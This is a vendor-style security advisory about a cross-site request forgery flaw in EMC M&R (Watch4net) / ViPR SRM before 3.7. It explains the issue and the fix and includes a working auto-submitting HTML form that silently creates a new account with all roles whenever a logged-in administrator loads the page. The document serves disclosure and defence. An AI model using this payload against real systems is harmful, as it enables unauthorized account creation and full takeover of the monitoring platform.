EMC M&R (Watch4net) lacks Cross-Site Request Forgery protection

Abstract

It was discovered that EMC M&R (Watch4net) does not protect against Cross-Site Request Forgery (CSRF) attacks. A successful CSRF attack can compromise end user data and may allow an attacker to perform an account hijack. If the targeted end user is the administrator account, this results in a full compromise of Watch4net.

Affected versions

Versions of EMC ViPR SRM prior to version 3.7 are affected by these vulnerabilities.

See also

Fix

EMC released 34247_ViPR-SRM to fix these vulnerabilities. Please note that this fix is only available for registered EMC Online Support customers.

Introduction

EMC M&R (formerly known as Watch4net) enables cross-domain performance monitoring of infrastructure and data center components in real-time - from a single, customizable dashboard. EMC M&R is a core embedded software technology existing in EMC ViPR, ViPR SRM and Service Assurance Suite.

EMC M&R (Watch4net) does not protect against Cross-Site Request Forgery (CSRF) attacks. A successful CSRF attack can compromise end user data and may allow an attacker to perform an account hijack. If the targeted end user is the administrator account, this results in a full compromise of Watch4net.

Details

Cross-Site Request Forgery (CSRF) is an attack, which forces an end user to execute unwanted actions on a web application to which the targeted user is currently authenticated. With a little help of social engineering an attacker may trick the users of a web application into executing actions (requests) of the attacker's choosing.

The following proof of concept will create a new user named CSRF with password set to 1 in Watch4net - provided that the victim is logged in with an administrator account.

<html>
	<body>
		<form action="http://<target>:58080/APG/admin/form" method="POST">
			<input type="hidden" name="form&#45;id" value="UserForm" />
			<input type="hidden" name="ident" value="" />
			<input type="hidden" name="old" value="" />
			<input type="hidden" name="name" value="CSRF" />
			<input type="hidden" name="password" value="1" />
			<input type="hidden" name="confirm" value="1" />
			<input type="hidden" name="title" value="" />
			<input type="hidden" name="first&#45;name" value="Han" />
			<input type="hidden" name="last&#45;name" value="Sahin" />
			<input type="hidden" name="email" value="attacker&#64;example&#46;com" />
			<input type="hidden" name="role" value="user" />
			<input type="hidden" name="profile" value="0" />
			<input type="hidden" name="user&#45;roles" value="5" />
			<input type="hidden" name="user&#45;roles" value="1" />
			<input type="hidden" name="user&#45;roles" value="3" />
			<input type="hidden" name="user&#45;roles" value="4" />
			<input type="hidden" name="user&#45;roles" value="2" />
			<input type="hidden" name="user&#45;roles" value="6" />
			<input type="hidden" name="filter" value="" />
			<input type="hidden" name="custom" value="true" />
			<input type="submit" value="Submit request" />
		</form>
		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>

Figure 1: Admin account created using CSRF

Questions or feedback?